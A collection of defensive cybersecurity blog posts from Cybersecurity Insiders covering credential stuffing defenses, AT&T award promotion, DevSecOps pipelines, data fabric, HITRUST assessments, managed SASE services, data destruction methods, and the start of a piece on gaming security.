This blog was written by an independent guest blogger.

Credential stuffing attacks essentially doubled in number between 2020 and 2021. As reported by Help Net Security, researchers detected 2,831,028,247 credential stuffing attacks between October 2020 and September 2021—growth of 98% over the previous year. Of the sectors that did experience credential stuffing during that period, gaming, digital and social media, as well as financial services experienced the greatest volume of attacks. What’s more, the United Kingdom was one of the top three regions that launched the most credential stuffing attacks in the world, followed by Asia and North America.

Looking towards the rest of 2022, the security community expects the volume of credential stuffing attacks to grow even further. “Expect to see credential stuffing attacks double in number again in 2022,” noted Forbes.

Why is credential stuffing a concern for organizations?

First, the role of automation in credential stuffing makes it possible for anyone—even attackers with low levels of expertise—to perpetrate these attacks. A low barrier of entry helps to explain why credential stuffing is so pervasive and why it’s expected to continue in this way for 2022.

Let’s examine the flow of credential stuffing to illustrate this fact. According to the Open Web Application Security Project (OWASP), a credential stuffing attack begins when a malicious actor acquires compromised usernames and passwords from password dumps, data breaches, phishing campaigns, and other means. They then use automated tools to test those credentials across multiple websites including banks and social media platforms. If they succeed in authenticating themselves with a credential set, they can then conduct a password reuse attack, harvest the compromised account’s information/funds, and/or monetize it on the dark web.

Which brings us to our second reason why credential stuffing is so concerning: the impact of a successful attack can be far-reaching. The applications of a successful credential stuffing attack are tantamount to a data breach, so organizations can bet that all data privacy regulations will be enforced.

Meaning? Organizations could incur fines totaling millions of dollars in the aftermath of credential stuffing, per Cybersecurity Dive. Those penalties don’t include the costs that organizations will need to pay to understand the impact of the attack, figure out which data the malicious actors might have compromised, and remediate the incident. They also don’t cover the brand damage and legal fees that organizations could face after notifying their customers.

Credential stuffing defense best practices

To avoid the costs discussed above, organizations need to take action to defend themselves against a credential stuffing attack. Here are seven ways that they can do this.

1. Make credential stuffing defense an ongoing collaborative discussion

Organizations can’t tackle credential stuffing if there’s not even a discussion about the threat. Acknowledging this reality, TechRepublic recommends that organizations bring their security, fraud, and digital teams together to discuss credential stuffing, among other fraud trends, along with ways that they can use digital metrics to coordinate their defense efforts.

2. Implement multi-factor authentication

Credential stuffing hinges on the fact that malicious actors can translate access to a credential set into access to an account. Multi-factor authentication (MFA) denies this pivot point, as it forces attackers to also provide another factor such as an SMS-based text code or a fingerprint for authentication. This raises the barrier of taking over an account by forcing malicious actors to compromise those additional authentication factors in addition to the original credential set.

3. Use security awareness to familiarize employees with password best practices

Organizations can go a long way towards blocking a credential stuffing attack by cultivating their employees’ levels of security awareness. For instance, they can educate their employees on how malicious actors can leverage password reuse as part of a credential stuffing campaign. Per How-To Geek, organizations can also provide employees with a password manager for storing credentials that they’ve created in accordance with company password policies.

4. Analyze and baseline traffic for signs of credential stuffing

Infosecurity Magazine recommends that organizations create a baseline for their traffic including account activity. They can then use that baseline to monitor for anomalies such as a spike in failed login attempts and unusual account access requests.

5. Prevent users from securing their accounts with exposed passwords

The last thing security teams want is for their employees to use a password that’s been exposed in a previous security incident. Malicious actors use data breaches, information dumps, and other leaks to power automated tools used in credential stuffing, after all. Acknowledging this point, infosec personnel need to monitor the web for data breaches, information dumps, and other leaks that malicious actors could use to engage in credential stuffing. They can actively monitor the news for these types of incidents. They can also rely on receiving alerts from data breach tracking services such as Have I Been Pwned (HIBP).

6. Implement device fingerprinting

Infosec teams can use operating system, web browser version, language settings, and other attributes to fingerprint an employee’s device. They can then leverage that fingerprint to monitor for suspicious activity such as a user attempting to authenticate themselves with the device in a different country, noted Security Boulevard. If a circumstance like that arises, security teams can then prompt employees to submit additional authentication factors to confirm that someone hasn’t taken over their account.

7. Avoid using email addresses as user IDs

Password reuse isn’t the only factor that increases the risk of a credential stuffing attack. So too does the reuse of usernames and/or account IDs. Salt Security agrees with this statement.

“Credential stuffing relies on users leveraging the same usernames or account IDs across services,” it noted in a blog post. “The risk runs higher when the ID is an email address since it is easily obtained or guessed by attackers.”

Subsequently, organizations should consider using unique usernames that malicious actors can’t use for their authentication attempts across multiple web services.

Beating credential stuffing with the basics

Credential stuffing is one of the most prevalent forms of attack today. This popularity is possible because of how simple it is for malicious actors to obtain exposed sets of credentials on the web. However, as discussed above, it’s also simple for organizations to defend themselves against credential stuffing. They can do so in large part by focusing on the basics such as implementing MFA, awareness training, and baselining their traffic.

The post 7 ways to defend against a credential stuffing attack appeared first on Cybersecurity Insiders.

Will Eborall, Asst VP, AT&T Cybersecurity and Edge Solutions Product Management, co-authored this blog.

The AT&T Cybersecurity team’s unwavering focus on managing risk while maximizing customer experience earns high marks from security experts and customers alike. The team garnered some well-earned official recognition of the quality of flexible services they run with the announcement that AT&T won the highest distinction Gold Award in four different service categories of the 2022 Cybersecurity Excellence Awards.

The highly competitive Cybersecurity Excellence Awards is an annual competition run by Cybersecurity Insiders that honors individuals and companies that demonstrate excellence, innovation, and leadership in information security. AT&T Cybersecurity was recognized as the top solution in the following categories:

  • Managed Security Services
  • Managed Detection and Response (MDR)
  • Endpoint Detection and Response
  • Secure Access Service Edge (SASE)

With over 900 entries across the range of Cybersecurity Excellence Awards categories, the competition award selection consisted of a two-part process. Finalists for each category were selected from the broader pool of nominations based on popular votes and comments received from the cybersecurity community, as well as the strength of the written nomination. Once finalists were winnowed down, Cybersecurity Insider’s award judges took a closer look at the finalist nominations’ demonstrated explanations and examples of the leadership, excellence and results in cybersecurity afforded by the service to determine winners.

Judges awarded each of the following four services the highest Gold Award for some of the reasons described below:

AT&T Managed Security Services picked up a gold award for Managed Security Services. Some of the considerations looked at by the judges included:

  • As one of the largest MSSPs in the world, AT&T Cybersecurity fosters strong relationships with leading security technology providers while incubating emerging innovators to provide best-in-class services 
  • AT&T Managed Security Services delivers services through eight global SOCs
  • AT&T Cybersecurity delivers accountability with thorough communication and comprehensive reporting to clients along with coordinated responses with defined service level agreements on change requests.
  • During the pandemic, AT&T Cybersecurity has helped customers persevere through the various disruptions caused by COVID-19 with its managed security services.
  • AT&T Cybersecurity supported customers of its AT&T DDoS Defense service as well as non-subscribing customers with emergency mitigation services.

AT&T Managed Threat Detection and Response won a gold award for Managed Detection and Response (MDR). The judges picked this service based on factors that included:

  • AT&T Managed Threat Detection and Response combines technology, intelligence, and 24×7 expertise in a service that can be deployed faster and has a starting price that’s less than the cost to hire a single security analyst.
  • AT&T’s MDR service is priced by the total number of events that are analyzed, so customers don’t have to worry about limitations by assets, environments, or number of employees in their organization.
  • AT&T Managed Threat Detection and Response is delivered through a unified platform that offers threat intelligence updates from AT&T Alient Labs, native cloud monitoring capabilities for IaaS and SaaS environments, service transparency into SOC operations, and built-in orchestration and automation through a single pane of glass.
  • NHS Management, a leader in providing consulting and administrative services to individual healthcare facilities and companies gained visibility into emerging threats it didn’t have before through AT&T’s MDR service.

AT&T Managed Endpoint Security earned a gold award for Endpoint Detection and Response. The following were a few of the points that swayed judges in this category:

  • AT&T Managed Endpoint Security offers users top tier security features the include tamper protection and patented AI algorithms that live on devices, automatic mapping and tracking of all endpoint activity, and IoT discovery and control.
  • The service offers platform integrations with AT&T Alien Labs Threat Intelligence and AT&T Alien Labs Open Threat Exchange (OTX) for better context about the endpoint threat environment
  • Through the AT&T Managed Endpoint Security alliance with SentinelOne, customers receive 24×7 threat monitoring and management by AT&T Security Operations Center (SOC) analysts for greater network visibility and faster endpoint threat detection.
  • AT&T Managed Endpoint Security provides comprehensive endpoint protection against ransomware and other cyberattacks through a unique rollback to safe state feature while also detecting highly advanced threats within an enterprise network or cloud environment.

AT&T SASE won a gold award for Secure Access Service Edge. The judges considered a number of factors, including:

  • AT&T was the first provider to offer a global managed SASE solution at scale, and most recently, AT&T expanded its SASE portfolio to include a new offering, AT&T SASE with Cisco.
  • With AT&T SASE’s combined networking and security technology and service expertise, the solutions offer a future-ready, unified solution through a single provider.
  • With AT&T SASE, businesses can control access for any device, connecting from any network. This enables the dynamic needs of today’s distributed workforce to deliver security-driven networking at every edge.

Winning even one cybersecurity solution award is a great distinction, but when a company is able to deliver four different award-winning offerings, we believe that’s a testament to its ability to put together an expert team that listens to the needs of its customers. AT&T Cybersecurity is proud of its results in the Cybersecurity Excellence Awards, as everyone here believes that they stand as a testament to the networking and security expertise that our customers have come to count on.  Our crack team of security analysts is constantly researching the threat environment to continually defend customer environments. To learn more about some of the trends in the past year that they’ve helped organizations contend with, check out the 2022 AT&T Cybersecurity Insights Report.

The post AT&T Cybersecurity earns four Cybersecurity Excellence Awards appeared first on Cybersecurity Insiders.

In the previous article about the coding process, we covered developers using secure coding practices and how to secure the central code repository that represents the single source of truth. After coding is complete, developers move to the build and test processes of the Continuous Integration (CI) phase. These processes use automation to compile code and test it for errors, vulnerabilities, license conformity, unexpected behavior, and of course bugs in the application.

The focus of DevSecOps is to help developers follow secure-coding best practices and open-source licensing policy that were identified in the planning process. In addition, DevSecOps helps testers by providing automated scanning and testing capabilities within the build pipeline.

What is in a build pipeline?

Build pipelines run on highly customizable platforms like Microsoft Azure DevOps, Jenkins, and Gitlab. The build pipeline pulls source code from a repository and packages the software into an artifact. The artifact is then stored in a different repository (called a registry) where it can be retrieved by the release pipeline. Jobs in the build pipeline perform the step-by-step tasks to create an application build. The jobs can be grouped into stages and run sequentially every time the build process is run. Jobs need a build server, or pools of build servers to run the pipeline and return a built application for testing.

Pipeline DevSecOps

DevSecOps partners with developers by inserting additional source code scanning tools as jobs into the build pipeline. The tools used depend on what is being built and is usually determined through DevSecOps collaboration with the development team to understand the architecture and design of the code. For most projects, DevSecOps should implement at a minimum, the scanning tools that look for vulnerabilities, poor coding practices and license violations.

Source code scanners

Pipelines allow automated application security (AppSec) scans to be run every time a new build is created. This capability allows DevSecOps to integrate static analysis (lint) tools like source code scanners that can run early in the software development lifecycle. Security scanners come in two forms: static application security testing (SAST) and dynamic application security testing (DAST).

SAST is run early in the development lifecycle because it scans source code before it is compiled. DAST runs after the development cycle and is focused on finding the same types of vulnerabilities hackers look for while the application is running.

SAST can look for supply chain attacks, source code errors, vulnerabilities, poor coding practices, and free open-source software (FOSS) license violations. SAST speeds up code reviews and delivers valuable information early in the project so developers can incorporate better secure coding practices. Picking the right SAST tool is important because different tools can scan different coding languages. By automating scanning and providing feedback early in the development process, developers are empowered by DevSecOps to be proactive in making security related code changes before the code becomes an application.

Container image scanners

Application builds that create containers for microservices like Docker are stored in a registry as an image artifact. These images have application code, additional software packages, and dependencies that are needed to run the application. Sometimes the images are built by the developers and other times are pulled from a public repository like Github.

Source code scanners review the source code, image scanners review the built application, packages, and dependencies. Image scanners look for container vulnerabilities and exploits like supply chain attacks and crypto jacking software.

Image scanners should be run during the build process so that vulnerabilities are identified and remediated by the development team quickly. Keeping an image small (fewest needed packages and dependencies) is a great (and easy) way for developers to reduce the attack surface of the image and speed up security scanning and remediating vulnerabilities.

In addition to image scanning, DevSecOps recommends the following criteria to protect the application. Images should be configured to not run on the host system using the admin (root) account. This protects the host from privilege escalation if the application is compromised.

Images should be signed by a trusted certificate authority so they have a trusted signature that can be verified when the image is deployed to an environment. Images should be stored in a dedicated image repository so that all internal microservices platforms (Docker and Kubernetes) only pull “approved” images.

Test process

Testing is one of the first environments that an application build is deployed into. Testing teams use tools like Selenium and Cucumber to help automate as much of the testing as possible. Automated test plans can benefit from iterative improvements that increase the test plan quality every time a build is created. DevSecOps has open-source tools like ZAP that support proxying and can sit between the testing tools to perform security scanning as the tests are examining the application. Bringing DevSecOps and the testing teams together helps builds trust and collaboration while speeding up testing and reducing the number of scripts and tools necessary to complete the testing process.

Bending the rules

Outages, quality issues, and common mistakes can happen when there is pressure to deliver in a compressed timeframe. Building and testing is where bending the rules may be accepted or even the current norm within the teams. Security scanners are designed to stop the build process if audits and compliance fail. If the development and testing teams are unaware of this risk, it will appear as builds and tests breaking. They will complain to their leaders who will come to the DevSecOp team and demand the tools get out of the way of the success of DevOps.

DevSecOps overcomes these concerns by being an integral part of the team with developers and testers. Coordination between DevSecOps and developers is also promoted by adding the findings from these tools into the same bug tracking tools used by testers. DevSecOps integrates by speaking about the changes and listening to incorporate the feedback loop, create inclusiveness, and collaborate to help everyone understand what the tools are doing, how they work, and why they are important.

Next steps

Security scanners help developers follow secure-coding and license compliance practices. Scanners and feedback work best when performed as early as possible in the build pipeline so adjustments can be made quickly and with minimal development impact. Using automation encourages developers and testers not to bend the rules. With the application built and tests complete, the software is ready to be packaged as a release.

The post DevSecOps build and test process appeared first on Cybersecurity Insiders.

This blog was written by an independent guest blogger.

Amidst sweeping digital transformation across the globe, numerous organizations have been seeking a better way to manage data. Still in the beginning stages of adoption, data fabric provides many possibilities as an integrated layer that unifies data from across endpoints. 

A combination of factors has created a digital environment where data is stored in several places at once, leaving cracks in security for fraudsters to take advantage of. Cybercrime has reached historic highs, with vulnerabilities that affect crucial industries such as healthcare, eCommerce, and manufacturing. 

Data fabric works like a needle and thread, stitching each business resource together as an interconnected data system that feeds data into one large connector. When each application is connected to every other part of your system, data silos are broken, allowing for complete transparency in the cloud or a hybrid approach. 

What is data fabric? How does it work? And how does data fabric impact cybersecurity? Let’s dive in. 

What is data fabric?

Data fabric is a modern data design concept to better integrate and connect processes across various resources and endpoints. Data fabric can continuously analyze assets to support the design and deployment of reusable data across all environments. 

By utilizing both human and machine capabilities, data fabric identifies and connects disparate data. This supports faster decision-making, re-engineering optimization, and enhanced data management practices.

For example, you could think of data fabric as a passive data observer that only acts when it encounters assets that need to be managed. Based on its specific implementation, data fabrics can automatically govern data and make suggestions for data alternatives. Both humans and machines work together to unify data and improve efficiency overall. 

How does it work?

Data fabric architecture provides strategic security and business advantages for companies and organizations. To better understand how data fabric works, let’s go over the six different layers of data fabric:

  • Data management — This layer is responsible for data security and governance. 
  • Data ingestion — This layer finds connections between structured and unstructured. 
  • Data processing — This layer refines data for accurate and relevant extraction.
  • Data orchestration — This layer makes data usable for teams by transforming, integrating, and cleansing the data. 
  • Data discovery — This layer precipitates new opportunities to integrate and develop insights from disparate data sources. 
  • Data access — Finally, this layer ensures that permissions and compliance conditions are met and allows access through virtual dashboards. 

This integrative and layered approach to data management helps protect organizations against the most prevalent attack types such as client-side, supply chain, business app, and even automated attacks. 

Who can benefit from data fabrics?

Because data fabric use cases are still developing, there are potentially many unknown instances where data fabric can provide a security advantage for organizations. However, the possibilities are endless based on the data fabric’s ability to eliminate silos and integrate data across various sources. Data fabric can be implemented as an identity theft prevention strategy, to improve performance and everything in between.

Here are just a few specific use cases for data fabric architecture:

  • Customer profiles
  • Preventative maintenance
  • Business analysis
  • Risk models
  • Fraud detection

Advantages of data fabric architectures

Even in its early stages, data fabric has been shown to improve efficiency from workflows to product life cycles significantly. In addition to increasing business productivity, here are some other examples of how adopters can benefit from a data fabric architecture:

  1. Intelligent data integration

Data fabric architectures use AI-powered tools to unify data across numerous endpoints and data types. With the help of metadata management, knowledge graphs, and machine learning, it makes data management easier than ever before. By automating data workloads, a data fabric architecture not only improves efficiency, but also eliminates siloed data, centralized data governance, and improves the quality of your business data. 

  1. Better data accessibility

The centralized nature of data fabric systems makes accessing data from various endpoints fast and simple. Data bottlenecks are reduced since data permissions can be controlled from a centralized location despite users’ physical locations. And data access can easily be granted when necessary for use by engineers, developers, and analysts. Data fabric enables workers to make business decisions faster and allows teams to prioritize tasks from a holistic business perspective. 

  1. Improved data protection

Possibly the most crucial aspect of implementing data fabric is that it improves your data security posture. You get the best of both worlds, broad data access, and improved data privacy. With more data governance and security guardrails in place with the help of a unified data fabric. Technical and data security teams can streamline encryption and data masking procedures while still having the ability to access data based on user permissions. 

Data fabric and cybersecurity

As a part of a robust cybersecurity ecosystem, data fabric acts as the foundation from which the entirety of your business data sets upon. When used correctly, data fabric makes business processes more efficient and improves data protection with the right defensive strategies built in. 

Because data fabric acts as a single source for all business data, there are many who wonder about its cybersecurity implications. In fact, most open source security vulnerabilities have a validated fix that must be patched. But many attackers take advantage of these entry points before organizations have time to update their software. 

Organizations using data fabric can also benefit from cybersecurity mesh to combine automation with a strategic security approach. Data mesh relies on the organizational structure to define data security needs so that the data fabric can more efficiently align with those needs. 

Gartner predicts that organizations that adopt a data fabric and cybersecurity mesh architecture will reduce the financial impact of data breaches by 90% by 2024. No other cybersecurity posture comes close to the security implications of data fabric across business applications. 

Data fabric is also essential to cybersecurity infrastructure because it requires that teams adopt a security-by-design outlook. With centralized data fabric built into your environment, organizations can greatly reduce their vulnerabilities and attack vectors from the inside out. 

Putting it all together

Data fabric provides organizations with a way to integrate data sources across platforms, users, and locations so that business data is available to those that need it when it is needed. While this does reduce data management issues, it raises important cybersecurity questions related to its centralized nature. 

However, data fabric and cybersecurity mesh work together to build integrated security controls that include encryption, compliance, virtual perimeter, and even real-time automatic vulnerability mitigation.

Now, stand-alone security solutions protecting numerous data sources can work together to improve security efforts overall. Data fabric is an essential aspect of a business-driven cyber strategy, especially for industries utilizing hybrid cloud setups, businesses struggling with disparate data, and an evolving cybersecurity landscape.

The post What is data fabric and how does it impact Cybersecurity? appeared first on Cybersecurity Insiders.

Data breaches are still on the rise in healthcare2021 accumulated 686 healthcare data breaches of 500 or more records in 2021, resulting in 45M exposed or stolen healthcare records.  2022 is off to a poor start with over 3.7M healthcare records compromised as of 3/2/2022.[1]

Healthcare organizations face a landscape that is increasingly riddled with complexities, threats, and a multitude of attack vectors.  The pandemic take a toll on hospitals and ransomware attacks increased significantly. Nevertheless, healthcare organizations must continue to provide patient care through various avenues that necessitate emerging and advanced digital solutions, like edge computing.  With that, comes cybersecurity risk.  This can be challenging for even the most mature organizations, but there are many healthcare organizations that are still lagging behind and do not have the fundamentals of cybersecurity in place. 

Cybersecurity frameworks for the healthcare industry

Frameworks are becoming increasingly more important to build that foundation, to measure improvements, and to drive results.  Frameworks allow for a defensible and rational approach to managing your cybersecurity risks and complying with regulatory requirements.    Many regulations purposely strike a balance between specificity and flexibility to allow organizations latitude in applying the requirements based upon their size, complexity, and risk assessment. 

Established frameworks are adopted across industries, some are industry-specific, but all continue to evolve as cybersecurity risks evolve.  Most recently we have seen the newly updated ISO 27002 standard published last month, the DoD has come out with CMMC 2.0 (NIST 800-171r2), and the National Institute of Standards and Technology (NIST) regularly publishes new and updated standards. 

The need for a vertical-specific framework

Adoption of a particular framework can vary from industry to industry.  One such framework is the HITRUST CSF that has been heavily adopted in the healthcare industry.  The HITRUST CSF was established to provide prescription and consistency in the application of security and privacy controls for healthcare organizations. It provides for the protection of health data by creating a single framework that harmonizes various, related compliance requirements and industry standards.  While HITRUST is no longer focused on only the healthcare industry, the adoption of the HITRUST CSF can help organizations in healthcare lay the foundation and continuously improve their cybersecurity posture and address existing and emerging threats. 

The HITRUST CSF is valuable to healthcare organizations for the reasons mentioned above….it provides a defensible approach to compliance with HIPAA, it is prescriptive in control implementation, and is continually updated based upon the threats and risks the healthcare industry faces.   The healthcare industry not only has to demonstrate cybersecurity risk management to regulators, but to business partners and clients as well.  HITRUST offers certification for this purpose. 

HITRUST has added two new assessments to provide organizations options. The assessment formerly known as the HITRUST CSF Validated Assessment could be daunting for some organizations to take on.  Given this, HITRUST published in early 2022 what is called the Implemented, 1-Year (i1) Assessment.   This assessment allows organizations to take a streamlined and a crawl, walk, run approach to assurance and certification. 

The i1 Assessment is based upon a static set of 219 controls with substantial coverage for NIST SP 171 revision 2, The HIPAA Security Rule, and the AICPA Availability Trust Services Principle, evaluating the maturity of control implementation.  This is an attractive assessment for organizations that need to demonstrate a moderate level of assurance and are willing to go through the assessment and certification process on an annual basis.  It is also a good stepping stone to higher levels of assurance.   

This does not replace the former HITRUST CSF Validated Assessment, which is now called the Risk-Based, 2 Year (r2) Assessment.  The r2 Assessment’s requirements are risk-based, where the number of controls are dependent on scoping factors and will vary from organization to organization.  The evaluation of the controls is very rigorous, analyzes policy, process, implemented, measured, and managed maturity, and demonstrates high assurance. 

Also new in 2022 is the Basic, Current-state (“bC”) Assessment, which is a self-assessment focused on  good security hygiene controls and is suitable for quick and low assurance requirements.  There is coverage for NISTIR 7621: Small Business Information Security Fundamentals. 

The bC, i1, and r2 provides various assurance options to meet organizational, partner, and client needs, and continues to reduce efforts in responding to third-party requests to demonstrate a sound, security posture. 

A balance of risk and transforming the delivery of patient care necessitate adopting a framework that is sustainable and continually updated, especially as healthcare organizations invest in cybersecurity strategies like securing the edge. 

[1] U.S Department of Health and Human Services Office of Civil Rights Breach Portal:  Notice to the Secretary of HHS Breach of Unsecured Protected Health Information

The post Healthcare focus:  Need for resilience appeared first on Cybersecurity Insiders.

SOC SASE

Recently the architecture model known as Secure Access Service Edge (SASE) has been gaining momentum. Not surprising, when the model provides benefits – including reduced complexity of management, improved network performance and resiliency, security policy implemented consistently across office and remote users and lower operational expense. In fact, according to a recent ESG survey, 70% of businesses are using or considering a SASE solution. But if SASE is supposed to simplify network and security management, then one may wonder, “what value does a managed services provider (MSP) offer?”

Why an MSP for SASE deployment?

SASE adoption

There are great number of answers to that question, but a good place to start is to create an understanding that the journey to SASE is going to be a little different for every enterprise. There are a many approaches and models in the market and many vendors to choose from.

First of all, one major reason that businesses are utilizing an MSP for SASE is because it’s just difficult and expensive to hire and retain technicians with the specialized skillset they require, particularly if they require 24/7 monitoring. In fact, according to a recent study, 57% of organizations have been negatively impacted by the cybersecurity skills shortage. Sometimes it just makes more financial sense and can improve an organization’s risk posture to outsource this to a trusted third-party.

In addition, while many technology providers claim to offer a complete SASE portfolio, it is important to note that it is not an off-the-shelf solution and can include many different components. There has been a lot of consolidation in the market over the past several years, with vendors acquiring other companies to build a more well-rounded suite, which has resulted in multiple management platforms. Most vendors are working to consolidate these to offer management through a single pane of glass but few have achieved that quite yet.

And then finally, SASE is not a “one and done” or plug-and-play solution. The vast majority of businesses are not going to rip out and replace their entire infrastructure at one time. Rather, it will be a gradual roll out of capabilities as they come upon their refresh cycle or as budgets for new initiatives are approved. Most large or well-established companies will be on a hybrid environment for the foreseeable future, with assets hosted in both the data center as well as in the cloud.

Benefits of working with an MSP

Sometimes it is difficult to know where to start with a multi-faceted solution such as SASE, and that is why it is so important to have a trusted advisor you can count on. Here are some of the key benefits you can expect to realize when working with industry-leading managed service providers:

  • Accelerated time to value and scale: A qualified MSP for SASE implementation will offer consulting services that can determine your organization’s readiness for SASE, identify the best solutions for your unique needs, and help chart a roadmap for rollouts. Should your business acquire other companies, add or reduce locations, or change workplace designations, it is often as simple as contacting your MSP, providing the required information, and signing a contract addendum.
  • Security and networking expertise: Being that SASE is a convergence of software defined wide-area networking and security you will need someone that has knowledge and experience in both disciplines. MSPs can meet this requirement and have the ability to integrate these components to deliver resilient, high-performance connectivity and protection.
  • Solution development experience: With so many vendors and solutions on the market, it may be difficult to know which offer the best mix of capabilities, protection, and performance. Conducting multiple proof of concepts (POCs) can be costly and time consuming. MSPs can remove this burden from your technology teams by evaluating offers, conducting comprehensive interoperability testing, technical validation, and solution certification to deliver the industry’s best technology elements that seamlessly work together.
  • Solution integration acumen: As mentioned above, it is unlikely that your organization will replace every component of their networking and security at the same time, which means that you will have legacy infrastructure that still needs to be supported alongside the new technology components and they may even be from different vendors. Managed service providers have the ability to integrate and manage a vast ecosystem of technology providers and capabilities in order to secure your entire environment.

Conclusion

With the rapid adoption of cloud delivered applications and services, the heightened expectations of customers when it comes to digital experience, and the pressing need to support work from anywhere, it is less a question of whether your business will adopt SASE, but rather when. In fact, you may have already started without knowing it. Regardless of where you are on your journey, an MSP can help ensure you avoid unnecessary detours and that you reach your desired outcomes.

The post Why use a managed services provider for your SASE implementation appeared first on Cybersecurity Insiders.

This blog was written by an independent guest blogger.

As Morgan Stanley Bank now knows, ignoring certified data destruction policies can be disastrous. The bank made news in 2020 when it was fined over $60 million for not using proper oversight when decommissioning two of its data centers. Regulators found that the organization had not addressed the risks associated with decommissioning hardware effectively. 

An ever-increasing number of IoT and Business Connect devices allows for numerous entry points for hackers electronically, but companies should also take care that they decommission their hardware. Unfortunately, studies show that many companies lack the necessary precautions for data destruction. 

What is data destruction?

Data destruction is a process that involves destroying information and records such as paper documents and digital information stored on hard drives, SSDs, optical disks, memory chips, and the like. The goal of digital data destruction is to eliminate any information that was previously held on the server or hardware so that it can’t ever be recovered by a third party or someone from within the organization. 

The increased cybersecurity events of 2020 and 2021 have highlighted the need for proper data destruction protocols across industries. Additionally, emphasizing the circular economy, sustainability, and eco-friendly practices means that more refurbished devices will be recycled and resold to new owners. If data is not completely destroyed, then that information is at risk. 

What happened at Morgan Stanley?

A lack of secure data destruction protocols can have profound implications. 

In 2016, Morgan Stanley hired a vendor to wipe all data from the servers. But they didn’t monitor their vendor or keep adequate documentation. As a result, the vendor failed to completely erase all the data from the hardware before selling it to recyclers. 

In 2019, a few of Morgan Stanley’s decommissioned servers went missing, and the disks were left with unencrypted customer data. This incident was attributed to a software flaw but still reflects a lack of oversight over one of the most critical business data practices.

These data flubs could have had a significant impact on the online privacy of their clients, but the bank maintains that none of their customers’ data was breached in either instance. Still, the data left on these devices could have easily been accessed by anyone in possession of the servers and other hardware. 

A person with sensitive customer information such as account and social security numbers, birthdates, contact information, and other crucial data could wreak havoc on customers and the organization as a whole. 

Benefits of secure data destruction

Improper data destruction protocols can leave customer and business data wide open to be stolen and used for malicious intentions. 

Businesses of all sizes need to ensure that their financial statements and documents such as profit and loss statement templates, invoices, third-party data, and everything in between are all safely secured using the correct data destruction activities. 

Here are just a few of the benefits of secure and certified data destruction policies and practices:

  • Complete removal of data — certified data destruction helps remove data from hardware without leaving a single trace of its existence. A simple delete is not enough to completely remove data from a device. Data destruction protects the data and the device owner.
  • DARP — Even encryption and firewall security are not enough to ensure that your data at rest is protected. Data at Rest Protection (DARP) through data destruction is the most secure way to ensure data that is no longer in use and isn’t serving any real purpose. 
  • Prevent cybersecurity incidents — Devices, both business and personal, no longer needed have to be permanently wiped with a certified data destruction tool that meets data erasure standards. Without it, they could be vulnerable to a breach resulting in financial and reputational losses, including fines and penalties. 
  • Meet compliance and regulation guidelines — Data protection laws worldwide such as GDPR, SOX, and HIPAA state clear rules for consumers’ right to erasure and to be forgotten. Data destruction policies ensure that these guidelines are met. 
  • Sustainable hardware refurbishing — Reducing e-waste has become a top priority as the circular economy comes into focus. Old devices like smartphones and laptops are not the only ones businesses can recycle. A new emphasis on recycling servers and other hardware means an increased need for complete data destruction. 

Methods for data destruction

Organizations use many methods to destroy data at rest permanently. Media wiping tools are essential for companies that use refurbished IT assets or recycle their hardware. These electronic devices must all be adequately wiped before safely passing on to their next owner: 

  • Computers
  • Smartphones
  • Tablets
  • Digital cameras
  • Media players
  • Printers
  • Monitors
  • Hard drives
  • Gaming consoles
  • External hardware
  • Peripheral devices

Secure and dispose of electronic devices, servers, and hardware by using these data destruction methods:

Delete or reformat

The two most common ways to attempt to rid a device of its data are by deleting or reformatting files. 

Deleting a file from a device will remove it, but it doesn’t destroy the data. The information within the deleted file will remain on the device’s hard drive or memory trip. 

Reformatting the disc also produces similar results. Reformatting will not wipe the data from the device, and it just replaces an existing file system with a brand new one. 

Using these methods to destroy data is ineffective and does not represent proper data destruction, but it is worth mentioning since it is often used as the first response. 

Wipe

Data wiping involves overwriting data on a device so that no one can read it. It is usually accomplished by connecting the affected media to a wiping device, but it can also be done internally. 

However, data wiping is time-consuming, especially for a business with lots of information across numerous devices. It’s a more practical approach for individuals. 

Overwriting data

Overwriting data and wiping data are very similar approaches to data destruction. Overwriting data refers to writing a pattern of ones and zeroes over the current data to hide it and prevent it from being read. 

However, if the data in question is a high-security risk, it may be worth taking a few extra passes at overwriting it. It ensures that the data is completely destroyed and not a single bit of shadow or remnant of pre-existing information can be detected. 

Overwriting data is by far the most common data destruction method used by organizations, but it is also very time-consuming. Additionally, you can only overwrite data on an undamaged device that still allows data to be written into it. 

Erasure

Another term for overwriting, complete erasure destroys all data stored on a hard drive and delivers a certificate of destruction. This certificate proves that data has been successfully erased from an electronic device. 

Erasure is a suitable method for businesses that purchase equipment such as desktops, enterprise data centers, and laptops off-lease.

Degaussing

Degaussing uses a high-powered magnet to destroy data. It is a quick and effective method to destroy sensitive data, but it has some disadvantages. 

Once a device has been degaussed, its hard drive is no longer operable. Besides that, there is no way to know whether all the data has been destroyed without an electron microscope. 

Physical destruction

It turns out that taking a hammer to a hard drive is a very effective data destruction method for businesses of all sizes. However, not all companies can afford to spend money on replacing hard drives that have been pummeled in the name of data privacy, so this is not always an ideal solution. 

Shredding 

Another method similar to physical destruction, shredding is the most secure and cost-effective data destruction strategy. Shredding involves reducing electronic devices to tiny pieces, no larger than a couple of millimeters. 

This method is ideal for high-security environments and is most commonly used when an organization has a stockpile of old media to destroy. 

Final thoughts

Many businesses will outsource their data destruction needs to a dedicated data destruction company. But beware, just like in Morgan Stanley’s case, you could still be held responsible for any data that remains. 

You may think that your organization isn’t susceptible to a major data breach from decommissioned data centers and other equipment. However, small businesses are the number one target for cybersecurity breaches. 

That’s why businesses of all sizes must take the correct steps to destroy data and ensure their customers’ information stays secure.

The post Formulating proper data destruction policies to reduce data breach risks appeared first on Cybersecurity Insiders.

Metaverse abstraction

Photo by Adi Goldstein on Unsplash

This blog was written by an independent guest blogger.

The technical infrastructure of video games requires a significant level of access to private data, whether through client-server side interactions or financial data. This has led to what Computer Weekly describes as a ‘relentless’ attack on the video game industry, with attacks against game hosts and customer credentials rising 224% in 2021. There are several techniques to managing a personal online presence in a way that deters cyber attacks, but the ever-broadening range of games and communication tools used to support gaming communities means these threats are only increasing, and are starting to affect games played in single-player.

Gaming exploits

Gaming hacks and exploits are nothing new. There has long been a industry around compromising game code integrity and releasing games for free, and within those games distributing malicious software to breach private user details and deploy them for the gain of the hacker. These have become less common in recent years due to awareness over online data hygiene, but the risks do remain.

